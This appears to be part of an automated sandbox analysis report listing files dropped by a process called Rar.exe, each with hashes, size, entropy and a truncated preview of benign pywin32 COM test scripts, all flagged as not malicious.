                                                                                                                                                                                                                                  SHA1:0EF73BCA733F310F398654BAEAF794E42BAACB2F
                                                                                                                                                                                                                                  SHA-256:A9F9668F46223A15A8EF94335C574367BDC92B10A90AF85E5BBBF13529A6DE7C
                                                                                                                                                                                                                                  SHA-512:1172314C09E60467052F583476DA13406E78B74DD07A9B30D4B88DD729CDA4A99101818D820A49CA8734BA3AD3714CD76F55FE377DFE0EAFA374F5E530440AE6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# OfficeEvents - test/demonstrate events with Word and Excel..import msvcrt.import sys.import threading.import time.import types..import pythoncom.from win32com.client import Dispatch, DispatchWithEvents..stopEvent = threading.Event()...def TestExcel():. class ExcelEvents:. def OnNewWorkbook(self, wb):. if type(wb) != types.InstanceType:. raise RuntimeError(. "The transformer doesnt appear to have translated this for us!". ). self.seen_events["OnNewWorkbook"] = None.. def OnWindowActivate(self, wb, wn):. if type(wb) != types.InstanceType or type(wn) != types.InstanceType:. raise RuntimeError(. "The transformer doesnt appear to have translated this for us!". ). self.seen_events["OnWindowActivate"] = None.. def OnWindowDeactivate(self, wb, wn):. self.seen_events["OnWindowDeactivate"] = None.. def OnSheetDea
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6069
                                                                                                                                                                                                                                  Entropy (8bit):4.4438118253540395
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:UsDGCgnLwjQIPJW2HC9ys/J/a8q6QaNTF19Tg2q6PMpYC4jE/fks7O1fhAHuXQhd:zYLkG9H/Jad6QaN51dC6PMpeQfkCOBhs
                                                                                                                                                                                                                                  MD5:5476DA59124678C0013F0085B6421DCB
                                                                                                                                                                                                                                  SHA1:246909EF6B78B16DA3FE850238631F3C6A570F9B
                                                                                                                                                                                                                                  SHA-256:04D0631A16D9CB712EBBE4AC79980F1D1D959A21C4077CA623C9A5BF98BAB03E
                                                                                                                                                                                                                                  SHA-512:F3D18F0D3DA18B108DBAC3D8B06F3D03F5DD640706F07E5992799E4EE1358CFD8C65275722FF295A201352CFC6C9697B56D13F4E86BD43B15B718AC50F00E898
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Testing pasing object between multiple COM threads..Uses standard COM marshalling to pass objects between threads. Even.though Python generally seems to work when you just pass COM objects.between threads, it shouldnt...This shows the "correct" way to do it...It shows that although we create new threads to use the Python.Interpreter,.COM marshalls back all calls to that object to the main Python thread,.which must be running a message loop (as this sample does)...When this test is run in "free threaded" mode (at this stage, you must.manually mark the COM objects as "ThreadingModel=Free", or run from a.service which has marked itself as free-threaded), then no marshalling.is done, and the Python.Interpreter object start doing the "expected" thing.- ie, it reports being on the same thread as its caller!..Python.exe needs a good way to mark itself as FreeThreaded - at the moment.this is a pain in the but!.."""..import threading.import unittest..import pythoncom.import win32api.import
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):660
                                                                                                                                                                                                                                  Entropy (8bit):4.474333029501136
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:joXCA1d0yJUZiaF2p0QpFZp38M7tm+ZhZ+4KJFkd7addbMTd7NIFGlaux5044i:j9gUYa0pprX3nZm+Z64KQd7chYd7NLEE
                                                                                                                                                                                                                                  MD5:E5BC0AD44019706CF0B5D95842253F50
                                                                                                                                                                                                                                  SHA1:96021E0ADA31F526BF2F1A828734C0A7A3EC27BA
                                                                                                                                                                                                                                  SHA-256:E484EDA75EDAFA3A89D25CC0A6E01C281874F7F8F6B2BB369EAA27E2FB7C3D80
                                                                                                                                                                                                                                  SHA-512:68E401C41EC08D57BF603735E636A2923D444AF466A0C0987E3FD5E6F96DB0870243E8C1EA3785D0F9215AB1FEC768838A535B642EF7C6E1AF7F9177B71FED87
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## AHH - I cant make this work!!!..# But this is the general idea...import sys..import netscape..error = "Netscape Test Error"..if __name__ == "__main__":. n = netscape.CNetworkCX(). rc = n.Open("http://d|/temp/apyext.html", 0, None, 0, None). if not rc:. raise error("Open method of Netscape failed"). while 1:. num, str = n.Read(None, 0). print("Got ", num, str). if num == 0:. break # used to be continue - no idea!!. if num == -1:. break. # sys.stdout.write(str). n.Close(). print("Done!"). del n. sys.last_type = sys.last_value = sys.last_traceback = None.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6397
                                                                                                                                                                                                                                  Entropy (8bit):4.814124921271407
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:sj1dQLZ/v93jNQqEdvEqxA88yfc6RaRS5AsxrzMVo:g1dQLZ/v93jNQqEdvEq30spMm
                                                                                                                                                                                                                                  MD5:9D0E938988F57EF84E20F84060B2D986
                                                                                                                                                                                                                                  SHA1:08FF3AA31C2E0AAB02B247FF6606C733FDFEB4B7
                                                                                                                                                                                                                                  SHA-256:D37175FA212C13E1751F7D97D8452F6801ABB91E52F35A000F35B9BE2018A7EF
                                                                                                                                                                                                                                  SHA-512:B851C3A7EEDD298D5FFCA2CC2263ED9D836AA7600A6BB83A2E7E3A1DCB0C239B751FB3A81D4D1D96A2BD79A5B71C026FF3DFA864EEF4C8120A253434459116B1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import pythoncom.import pywintypes.import win32api.import win32com.import win32com.client.import win32com.client.dynamic.import win32com.server.util.import win32ui.from pywin32_testutil import str2bytes.from pywintypes import Unicode.from win32com import storagecon.from win32com.axcontrol import axcontrol.from win32com.test.util import CheckClean..S_OK = 0...import win32timezone..now = win32timezone.now()...class LockBytes:. _public_methods_ = [. "ReadAt",. "WriteAt",. "Flush",. "SetSize",. "LockRegion",. "UnlockRegion",. "Stat",. ]. _com_interfaces_ = [pythoncom.IID_ILockBytes].. def __init__(self, data=""):. self.data = str2bytes(data). self.ctime = now. self.mtime = now. self.atime = now.. def ReadAt(self, offset, cb):. print("ReadAt"). result = self.data[offset : offset + cb]. return result.. def WriteAt(self, offset, data):. print("WriteAt " + str(o
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2700
                                                                                                                                                                                                                                  Entropy (8bit):4.559955566559269
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:kbexmD7EdAgFlhdY9ot0qHerVcXx3AgFlhdHCtFfS:kbexmD7g7Y9o0rVchV7HC3q
                                                                                                                                                                                                                                  MD5:9CE54462DB78DE2E99A586E18F2A3C3F
                                                                                                                                                                                                                                  SHA1:D6671055DCCFC76DA924B9FF9CAFC6E7BEE90B52
                                                                                                                                                                                                                                  SHA-256:CAC4BF53997469326FECB9603F0B8C4CCAEE479C61ACD14191259D1B3AFF3AC4
                                                                                                                                                                                                                                  SHA-512:C097E2F75CD011C2922C7C00821A0E7A168B6C8669B8AA9D86450ED77D9A71A74C8E38DAED4CFD562CC6C6A15D10620846D60F076805DE1DC02DF85251E26A9E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import sys.import unittest..import pythoncom.from win32com.client import Dispatch.from win32com.client.gencache import EnsureDispatch...class PippoTester(unittest.TestCase):. def setUp(self):. from win32com.test import pippo_server. from win32com.test.util import RegisterPythonServer.. RegisterPythonServer(pippo_server.__file__, "Python.Test.Pippo"). # create it.. self.object = Dispatch("Python.Test.Pippo").. def testLeaks(self):. try:. gtrc = sys.gettotalrefcount. except AttributeError:. print("Please run this with python_d for leak tests"). gtrc = lambda: 0. # note creating self.object() should have consumed our "one time" leaks. self.object.Method1(). start = gtrc(). for i in range(1000):. object = Dispatch("Python.Test.Pippo"). object.Method1(). object = None. end = gtrc(). if end - start > 5:. self.fail("We lost %
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29052
                                                                                                                                                                                                                                  Entropy (8bit):4.890042957890085
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:vaMlDQn2MrKnG4uLxszu5eNNnlf26DnIS+L6lmkA/HwruHyWYjob:yMlDQn2eKnG4uLazuEFe+Yks3S+
                                                                                                                                                                                                                                  MD5:72DEAA8CD99A49B7E2460E1A7FA5B22A
                                                                                                                                                                                                                                  SHA1:D338F048C6E95CB5012288835F3AB3AAA871B863
                                                                                                                                                                                                                                  SHA-256:53A5CD16541259E1D495ED3E628018C6EB68158CF4B558725934E9280C033FDD
                                                                                                                                                                                                                                  SHA-512:06979383CAF513AFAEF2725EC2B54DE154D998D1E54D65417F285D88DDDA815CBD4758C1467AB7EC312070C0F66280603B31502E7A6FF277DCE75709A95F46D3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# NOTE - Still seems to be a leak here somewhere.# gateway count doesnt hit zero. Hence the print statements!..import sys..sys.coinit_flags = 0 # Must be free-threaded!.import datetime.import decimal.import os.import time..import pythoncom.import pywintypes.import win32api.import win32com.import win32com.client.connect.import win32timezone.import winerror.from pywin32_testutil import str2memory.from win32com.client import VARIANT, CastTo, DispatchBaseClass, constants.from win32com.test.util import CheckClean, RegisterPythonServer..importMsg = "**** PyCOMTest is not installed ***\n PyCOMTest is a Python test specific COM client and server.\n It is likely this server is not installed on this machine\n To install the server, you must get the win32com sources\n and build it using MS Visual C++"..error = Exception..# This test uses a Python implemented COM server - ensure correctly registered..RegisterPythonServer(. os.path.join(os.path.dirname(__file__), "..", "servers", "test_pyc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1087
                                                                                                                                                                                                                                  Entropy (8bit):5.00200123737897
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:PPLDQEkiqPfasc7wpLFbm7/c3jDBzDxvbdSND+epreK2:PjDQErqXasrbm/c3vlzaDJp6j
                                                                                                                                                                                                                                  MD5:C3AA56BDA9617131859C3583BCEC8520
                                                                                                                                                                                                                                  SHA1:B198688A397650A1B4818703AE1FE05D76DC609F
                                                                                                                                                                                                                                  SHA-256:0CA4E6960C37322B4A1D7BBD5C2465D3F749BD13A18F71609855AD825B8A573F
                                                                                                                                                                                                                                  SHA-512:7849C7F02D50FB841C252CCC72D99F579B3183E3F7AB0476234608F6DD3F1C8BE5EE38A22E1A6D81568C48926BDD2B45BA166A784132B6C1E416BA46D72159D6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:function print(msg).{. WScript.Echo(msg) ;.}..function check(condition, msg).{. if (!condition) {. print("***** testPyScriptlet.js failed *****");. print(msg);. }.}..var thisScriptEngine = ScriptEngine() ;..var majorVersion = ScriptEngineMajorVersion() ;.var minorVersion = ScriptEngineMinorVersion() ;.var buildVersion = ScriptEngineBuildVersion() ;..WScript.Echo(thisScriptEngine + " Version " + majorVersion + "." + minorVersion + " Build " + buildVersion) ;..var scriptlet = new ActiveXObject("TestPys.Scriptlet") ;..check(scriptlet.PyProp1=="PyScript Property1", "PyProp1 wasn't correct initial value");.scriptlet.PyProp1 = "New Value";.check(scriptlet.PyProp1=="New Value", "PyProp1 wasn't correct new value");..check(scriptlet.PyProp2=="PyScript Property2", "PyProp2 wasn't correct initial value");.scriptlet.PyProp2 = "Another New Value";.check(scriptlet.PyProp2=="Another New Value", "PyProp2 wasn't correct new value");..check(scriptlet.PyMethod1()=="PyMethod1 called", "Method1 w
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):762
                                                                                                                                                                                                                                  Entropy (8bit):4.249417436354547
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:7Ly7L7LSzm9rsEfAAoFCgfYUhwZB+M8d6lU2Nu/b7MFDGZf02pV7u:KjOy9rsIAtF1nhgYMI6a2u//M1GZRpVS
                                                                                                                                                                                                                                  MD5:0D8E6608A225F367A0B8523523658194
                                                                                                                                                                                                                                  SHA1:4C985FB658A70D81669081E8ADE5654E15CFD936
                                                                                                                                                                                                                                  SHA-256:722BBB52AF304FBB3CB6AC325933BE4DAE025F6C5EFB5E1A949FBB7753F3A4D0
                                                                                                                                                                                                                                  SHA-512:9C14639B97F7C3A760888F5B80A70132790C9C2710E3BF6420D88514F1D08A4B0767FF3D1FB27BEF28EEBD4FFAF04C6A52DE55C2E1049DC76AA0102EFAF6D89F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import pythoncom.import win32com.test.util.import winerror...class TestROT(win32com.test.util.TestCase):. def testit(self):. ctx = pythoncom.CreateBindCtx(). rot = pythoncom.GetRunningObjectTable(). num = 0. for mk in rot:. name = mk.GetDisplayName(ctx, None). num += 1. # Monikers themselves can iterate their contents (sometimes :). try:. for sub in mk:. num += 1. except pythoncom.com_error as exc:. if exc.hresult != winerror.E_NOTIMPL:. raise.. # if num < 2:. # print "Only", num, "objects in the ROT - this is unusual"...if __name__ == "__main__":. unittest.main().
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1391
                                                                                                                                                                                                                                  Entropy (8bit):4.706826540555441
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:qwpjcnNA9Yieey8XzXEV6yAGX1bSaPkCwRHPBqwRywSX9UpVLU:qwlcoYe97EV6yrX1maPkCwdPBqwkwkUo
                                                                                                                                                                                                                                  MD5:23988C675E63F14316531CDEED69BE2F
                                                                                                                                                                                                                                  SHA1:640E181A081B9CCAE3E5DEF2D0D89BFAB6190FA7
                                                                                                                                                                                                                                  SHA-256:458378BC8C3E5D33A555091F5DB0AAFCD1427A18E34C40820742889B58B95585
                                                                                                                                                                                                                                  SHA-512:62D77C4A79EAEE64FE2E7F5B5985C7D7BAAB4EC1811A1DC25D3E4FC4FA8E38A6C224407F4012846B0CD5179C9EECF0D4067365036364150F2EDC2873478814A4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import pythoncom.import win32com.client.dynamic.import win32com.test.util.import winerror...def TestConnections():. import win32com.demos.connect.. win32com.demos.connect.test()...class InterpCase(win32com.test.util.TestCase):. def setUp(self):. # Ensure the correct version registered.. from win32com.servers import interp. from win32com.test.util import RegisterPythonServer.. RegisterPythonServer(interp.__file__, "Python.Interpreter").. def _testInterp(self, interp):. self.assertEqual(interp.Eval("1+1"), 2). win32com.test.util.assertRaisesCOM_HRESULT(. self, winerror.DISP_E_TYPEMISMATCH, interp.Eval, 2. ).. def testInproc(self):. interp = win32com.client.dynamic.Dispatch(. "Python.Interpreter", clsctx=pythoncom.CLSCTX_INPROC. ). self._testInterp(interp).. def testLocalServer(self):. interp = win32com.client.dynamic.Dispatch(. "Python.Interpret
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9712
                                                                                                                                                                                                                                  Entropy (8bit):4.696975918107451
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:pgYVJMiP5CCAsa3ilzj1lBJOvmv0LS2Yz1pECCH4CpV6cQUYBZLSsXM4:ppCC7amzj1lOuvXCH4CGcQU/P4
                                                                                                                                                                                                                                  MD5:32117930BDE8A38BB8DCBB9A4D8198BF
                                                                                                                                                                                                                                  SHA1:BB73B66B10AF6246A9EF010EDB59D9E4E36D2B6D
                                                                                                                                                                                                                                  SHA-256:80B49EC53D6FB396775BADEC4A0D200D9891E654CCB5153109FC9F3E3230524B
                                                                                                                                                                                                                                  SHA-512:AFE9ADC829E30DC8C8F25B665E2C0BBC87B77A8078EE05D51E2B61CAAF07E42913E844144B1F1F7E97C6077D16BE698B85895D7AAA64DC01B2DDE43C3217ADC3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import datetime.import os.import struct.import sys..import win32timezone..try:. sys_maxsize = sys.maxsize # 2.6 and later - maxsize != maxint on 64bits.except AttributeError:. sys_maxsize = sys.maxint..import pythoncom.import pywintypes.import win32com.test.util.import win32con.from pywin32_testutil import str2bytes.from win32com.shell import shell.from win32com.shell.shellcon import *.from win32com.storagecon import *...class ShellTester(win32com.test.util.TestCase):. def testShellLink(self):. desktop = str(shell.SHGetSpecialFolderPath(0, CSIDL_DESKTOP)). num = 0. shellLink = pythoncom.CoCreateInstance(. shell.CLSID_ShellLink,. None,. pythoncom.CLSCTX_INPROC_SERVER,. shell.IID_IShellLink,. ). persistFile = shellLink.QueryInterface(pythoncom.IID_IPersistFile). names = [os.path.join(desktop, n) for n in os.listdir(desktop)]. programs = str(shell.SHGetSpecialFolderPath(0, CSIDL_PROGRAMS
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3625
                                                                                                                                                                                                                                  Entropy (8bit):4.665780791634578
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:E0r6nYZmE9W2JjQy+3IRPniJ+rJyqBNQE9WQKnPNtgMrCoUPNhRfS:E0unY39VJCItn5BN/9C1tIRq
                                                                                                                                                                                                                                  MD5:31FE9649C7E47F2D9D4BB6717B8E553C
                                                                                                                                                                                                                                  SHA1:6F26774EE37B8412FCA90E77C63E08EB670DDA84
                                                                                                                                                                                                                                  SHA-256:1AF4FB1C67236D552F8C4BA3FFE8C91A4C5686C98D3AB1C646E1E05CE39CB509
                                                                                                                                                                                                                                  SHA-512:FC99DB030FD5B102705510EB5DD34AA7C5ECF7AF9E97764ED90C047FB814CF7FCE6B74946AE941A7B40D814D08DE07722F04C0830D218E08F806335638BF831F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import pythoncom.import win32api.import win32com.test.util.from win32com import storagecon...class TestEnum(win32com.test.util.TestCase):. def testit(self):. fname, tmp = win32api.GetTempFileName(win32api.GetTempPath(), "stg"). m = storagecon.STGM_READWRITE | storagecon.STGM_SHARE_EXCLUSIVE. ## file, mode, format, attrs (always 0), IID (IStorage or IPropertySetStorage, storage options(only used with STGFMT_DOCFILE). pss = pythoncom.StgOpenStorageEx(. fname, m, storagecon.STGFMT_FILE, 0, pythoncom.IID_IPropertySetStorage. ). ### {"Version":2,"reserved":0,"SectorSize":512,"TemplateFile":u'somefilename'}).. ## FMTID_SummaryInformation FMTID_DocSummaryInformation FMTID_UserDefinedProperties. psuser = pss.Create(. pythoncom.FMTID_UserDefinedProperties,. pythoncom.IID_IPropertySetStorage,. storagecon.PROPSETFLAG_DEFAULT,. storagecon
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4310
                                                                                                                                                                                                                                  Entropy (8bit):4.653554216679465
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:MrVx4eETBfOd0SVb8tYM6Rd+smYAbdIF6IWm9AIbJNiLFxS5hq:MrVSe0BfOd0SVwtYM6P+smYA26IWBSrq
                                                                                                                                                                                                                                  MD5:3E84ECE2EBF5845441965B5484AB2E05
                                                                                                                                                                                                                                  SHA1:03561EC1979B1B1C33A0E00DF85D862972C288EF
                                                                                                                                                                                                                                  SHA-256:495150654FC1418F26F305061DE4C1D3EF88AE62B3245CBFA9D0C1B49F2DF95B
                                                                                                                                                                                                                                  SHA-512:C0871F43D00485B0CD30B4C1025CB9C5E4027B8726658AF15759A2F566CB28B10B207511E38FB2E96E6153DBB588C54572E49DCCFD0EBEC135735D8B3DAB3E80
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import pythoncom.import win32com.server.util.import win32com.test.util.from pywin32_testutil import str2bytes...class Persists:. _public_methods_ = [. "GetClassID",. "IsDirty",. "Load",. "Save",. "GetSizeMax",. "InitNew",. ]. _com_interfaces_ = [pythoncom.IID_IPersistStreamInit].. def __init__(self):. self.data = str2bytes("abcdefg"). self.dirty = 1.. def GetClassID(self):. return pythoncom.IID_NULL.. def IsDirty(self):. return self.dirty.. def Load(self, stream):. self.data = stream.Read(26).. def Save(self, stream, clearDirty):. stream.Write(self.data). if clearDirty:. self.dirty = 0.. def GetSizeMax(self):. return 1024.. def InitNew(self):. pass...class Stream:. _public_methods_ = ["Read", "Write", "Seek"]. _com_interfaces_ = [pythoncom.IID_IStream].. def __init__(self, data):. self.data = data. self
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):468
                                                                                                                                                                                                                                  Entropy (8bit):4.642578373992172
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:LLyD1GtYAR9YvALRYaHMfY2BmBJg0ASxuUBbzjx2pV7u:aJmYAR90ALqaHOGJg0MUBbP4pVS
                                                                                                                                                                                                                                  MD5:232B63F04ED5AF9A55D9AA29323B1A5A
                                                                                                                                                                                                                                  SHA1:0E566DF1E6CF68EF3F9593F7FAA9504560667BB3
                                                                                                                                                                                                                                  SHA-256:C0EE7863FB5BEDA45AB2F867878971539B7E9CFACC5AA5621476729F74432C23
                                                                                                                                                                                                                                  SHA-512:D7AB3C438DE049BC9A8CBA6ABB4B5FAFE91D13C8CE5258C9602D2F81EEE80FD23B3F719ECB4EC062C3C3CF322F5B3CF48B9A3A86FE85897C63281C4ED185FE4A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import win32com.test.util.from win32com.client import GetObject...class Simple(win32com.test.util.TestCase):. def testit(self):. cses = GetObject("WinMgMts:").InstancesOf("Win32_Process"). vals = []. for cs in cses:. val = cs.Properties_("Caption").Value. vals.append(val). self.assertFalse(len(vals) < 5, "We only found %d processes!" % len(vals))...if __name__ == "__main__":. unittest.main().
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9904
                                                                                                                                                                                                                                  Entropy (8bit):4.5596532805041745
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:RbcidMLQ0fbgntHlvAJE4Eyl5gQ16OMPunmstb3JCOSNk3XNj8d:RbF3fdpYEyc3kghknR+
                                                                                                                                                                                                                                  MD5:762B5806764FB8884DDF708AC1713DAF
                                                                                                                                                                                                                                  SHA1:9D3F88513B31F7C014953ADC003284EE169D262B
                                                                                                                                                                                                                                  SHA-256:D1095A75E18D533102A903BBC6A901FABC72BCE0433BC5A6741EF8F449344BF4
                                                                                                                                                                                                                                  SHA-512:17D2B8FD164377BD7361F50CB09C7C595B14B15B4FD9B5BCE5DE0F1966FC10B51CD1468013FD17A3204AF23A7C61905400ECA3D0A085C8E1F4F24C06A088E3BC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import getopt.import os.import re.import sys.import traceback.import unittest..try:. this_file = __file__.except NameError:. this_file = sys.argv[0]..win32com_src_dir = os.path.abspath(os.path.join(this_file, "../.."))..import win32com..# We'd prefer the win32com namespace to be the parent of __file__ - ie, our source-tree,.# rather than the version installed - otherwise every .py change needs a full install to.# test!.# We can't patch win32comext as most of them have a .pyd in their root :(.# This clearly ins't ideal or perfect :).win32com.__path__[0] = win32com_src_dir..import pythoncom.import win32com.client.from win32com.test.util import (. CapturingFunctionTestCase,. CheckClean,. RegisterPythonServer,. ShellTestCase,. TestCase,. TestLoader,. TestRunner,.)..verbosity = 1 # default unittest verbosity....def GenerateAndRunOldStyle():. from . import GenTestScripts.. GenTestScripts.GenerateAll(). try:. pass #. finally:. GenTestScri
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1922
                                                                                                                                                                                                                                  Entropy (8bit):4.632062553526672
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:/DArNcTt2i5aGZBmO8Q3U/8AMahNt9YC7:/DAoxaWcO8QbaRn7
                                                                                                                                                                                                                                  MD5:32824449739BE20E2462D0D5D9005CF9
                                                                                                                                                                                                                                  SHA1:5ED03EDE8C1DA880429F946B575D8E764441565D
                                                                                                                                                                                                                                  SHA-256:D7865B59B9A3D0F3A2A5FEDE37447FEDAA81E0A4EFBFD2DE329AAC82A1D1FF1F
                                                                                                                                                                                                                                  SHA-512:F15B0D2C6E061821C180F5E69163A0F04E3B762A765893181F946C29D3CBF5B1EEE45EB75E0060F18E91A649B5462FF26D4C7F80AF09F2A1DCE85AAA6520A22A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Test makepy - try and run it over every OCX in the windows system directory...import sys.import traceback..import pythoncom.import win32api.import win32com.test.util.import winerror.from win32com.client import gencache, makepy, selecttlb...def TestBuildAll(verbose=1):. num = 0. tlbInfos = selecttlb.EnumTlbs(). for info in tlbInfos:. if verbose:. print("%s (%s)" % (info.desc, info.dll)). try:. makepy.GenerateFromTypeLibSpec(info). # sys.stderr.write("Attr typeflags for coclass referenced object %s=%d (%d), typekind=%d\n" % (name, refAttr.wTypeFlags, refAttr.wTypeFlags & pythoncom.TYPEFLAG_FDUAL,refAttr.typekind)). num += 1. except pythoncom.com_error as details:. # Ignore these 2 errors, as the are very common and can obscure. # useful warnings.. if details.hresult not in [. winerror.TYPE_E_CANTLOADLIBRARY,. winerror.TYPE_E_LIBNOTREGISTERED,
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20911
                                                                                                                                                                                                                                  Entropy (8bit):4.667838645415224
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:HG8iXGFLsGFG2gC3UaBNtxtwYtotz/G6M9G5CPu7ugGyb7jiV9h+KEST+J/E/KEB:HGOUetxtFtotC6OG8eiRKI3l5rJyjEOg
                                                                                                                                                                                                                                  MD5:2C2F8654593CD56FA8550FFE38A76FDC
                                                                                                                                                                                                                                  SHA1:03B23958261A9DD7D8B986CA3CCFCD4358C3C813
                                                                                                                                                                                                                                  SHA-256:BC938B79C1CB61F3B4D79C3E239CB60F0F7AF98CF88FA3DADBB30E935E929421
                                                                                                                                                                                                                                  SHA-512:89E4E93ED244D50380085D174D58E1A1C7F01C2C91D39311503AD482B5DCAF7CA73295860F47DCAC3466DC7B7413E2F60E9F584193A2CB45E27F2A8CCF731768
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Test code for a VB Program..#.# This requires the PythonCOM VB Test Harness..#..import sys.import traceback..import pythoncom.import win32com.client.import win32com.client.dynamic.import win32com.client.gencache.import winerror.from pywin32_testutil import str2memory.from win32com.server.util import NewCollection, wrap.from win32com.test import util..# for debugging.useDispatcher = None.## import win32com.server.dispatcher.## useDispatcher = win32com.server.dispatcher.DefaultDebugDispatcher..error = RuntimeError...# Set up a COM object that VB will do some callbacks on. This is used.# to test byref params for gateway IDispatch..class TestObject:. _public_methods_ = [. "CallbackVoidOneByRef",. "CallbackResultOneByRef",. "CallbackVoidTwoByRef",. "CallbackString",. "CallbackResultOneByRefButReturnNone",. "CallbackVoidOneByRefButReturnNone",. "CallbackArrayResult",. "CallbackArrayResultOneArrayByRef",. "CallbackArrayRes
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1096
                                                                                                                                                                                                                                  Entropy (8bit):4.691199509807831
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:aJws2q91vyqW5NgXnnUutaNiVaok5OpVS:Ews2kVvQNQnn1mGTfS
                                                                                                                                                                                                                                  MD5:85D4894892C1975ABDC339212CBAFD49
